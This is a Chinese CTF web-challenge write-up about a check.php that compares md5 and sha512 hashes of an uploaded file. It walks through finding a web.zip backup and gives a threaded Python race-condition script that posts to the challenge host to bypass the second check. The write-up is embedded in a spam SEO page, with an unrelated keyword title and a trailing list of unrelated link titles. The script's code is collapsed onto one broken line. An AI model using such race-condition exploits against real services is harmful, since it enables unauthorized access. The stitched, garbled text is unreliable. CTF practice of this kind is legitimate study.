当前位置: 首页 > news >正文

网站导航条模板化学sem是什么意思

网站导航条模板,化学sem是什么意思,做网站要法人身份证吗,深汕特别合作区属于哪个区0x00 前言 CTF 加解密合集CTF Web合集 0x01 题目 0x02 Write Up 首先跑一下字典,这里用的dirmap,可以看到有一个web.zip 下载下来之后发现是一个网站备份,备份的是check.php.bak 然后接着看,可以看到这里不太可能是sql注入,有…

0x00 前言

  • CTF 加解密合集
  • CTF Web合集

0x01 题目

在这里插入图片描述

0x02 Write Up

首先跑一下字典,这里用的dirmap,可以看到有一个web.zip

在这里插入图片描述
下载下来之后发现是一个网站备份,备份的是check.php.bak

然后接着看,可以看到这里不太可能是sql注入,有一个请求 check.php?token="+token+"&php://input"

在这里插入图片描述
正好接着上一个文件备份的内容,看一下源码

在这里插入图片描述
首先token是将date("i")进行md5,然后就是文件md5对比,要求md5一致,但是sha512不一样,这里比较的文件是key.dat

直接访问进行下载即可。

原理就是将上传的文件保存为flag.dat,然后进行对比,那么这种情况肯定会出现条件竞争,也就是说flag.dat在比较完第一次之后被覆盖了的话,就可以满足第二个条件

import requests
import time
import hashlib
import threadingi=str(time.localtime().tm_min)
m=hashlib.md5(i.encode()).hexdigest()def go_to(data):try:url=f"http://1babff5a-576a-48b8-9f50-d4feeb5b7cbd.challenge.ctf.show/check.php?token={m}&php://input"s=requests.post(url,data=data)print(s.text)except Exception as e:passwith open('key.dat','rb') as t:data1=t.read()pass
for i in range(20):threading.Thread(target=go_to,args=(data1,)).start()
for i in range(20):data2='abbcd'threading.Thread(target=go_to,args=(data2,)).start()

在这里插入图片描述

以上

http://www.tj-hxxt.cn/news/40364.html

相关文章:

  • 有哪些网站做的好处免费网站在线客服系统源码
  • 免费b站推广网站mmm大众网潍坊疫情
  • 小程序与app有什么区别seo策略工具
  • 做网站收款支付宝接口上海专业排名优化公司
  • 让别人访问我的网站百度官方网首页
  • 网站建设发展趋势网站怎么打开
  • 中英文双语网站网络推广公司有哪些
  • 网络设置网站百度站长平台网址
  • 可以发锚文本的网站新网站友链
  • 泰安房产网签查询系统杭州seo外包
  • wordpress 网站首页可以打开_其他页面打不开百度代理授权查询
  • 网站分享插件怎么做关键词竞价广告
  • 建筑人才招聘网站百度网盘app免费下载安装老版本
  • 怎么网站推广企业seo顾问
  • 美容网站建设北京企业推广
  • 电商网站 性能目标有哪些找客户的软件有哪些
  • 带紫色箭头做网站软件yw77731域名查询
  • 科技小发明小制作seo短期培训班
  • 淘宝网发布网站建设广州seo优化
  • 阿里做的网站后台怎么进seo模拟点击软件源码
  • 广州荔湾网站制作公司建站流程主要有哪些
  • 2013年四川省泸州市技能竞赛网站建设样稿seo自动排名软件
  • 网站建设的问题对网站外部的搜索引擎优化
  • 湖南人工智能建站系统软件河北百度推广客服电话
  • 昆明seo网站排名关键词搜索广告
  • 网站远程数据库百度一下官网首页网址
  • 淄博网站建设-至信网络百度seo关键词优化软件
  • 建设银行交学费网站2018免费发布推广的平台有哪些
  • 中国空间站有几个舱段怎么下载app到手机上
  • 怎样优古网络公司网站后台松松软文平台